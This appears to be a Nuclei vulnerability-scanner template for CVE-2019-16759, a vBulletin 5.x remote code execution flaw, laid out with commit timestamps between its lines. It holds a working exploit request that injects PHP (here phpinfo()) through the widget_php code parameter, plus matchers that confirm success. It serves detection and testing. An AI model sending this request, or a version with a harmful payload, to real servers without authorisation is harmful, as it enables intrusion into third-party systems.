2021-01-02 04:59:06 +00:00
id : CVE-2019-16759
2020-07-04 15:56:10 +00:00
info :
2021-02-05 19:44:41 +00:00
name : 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author : madrobot
2021-09-10 11:26:40 +00:00
severity : critical
2021-02-05 19:44:41 +00:00
reference : https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
tags : cve,cve2019,vbulletin,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2019-16759
cwe-id : CWE-94
description : "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request."
2020-07-04 15:56:10 +00:00
requests :
- raw :
- |
2021-02-05 19:44:41 +00:00
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type : application/x-www-form-urlencoded
2020-07-04 15:56:10 +00:00
2021-02-05 19:44:41 +00:00
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
2020-07-04 15:56:10 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2021-02-05 19:44:41 +00:00
- "PHP Version"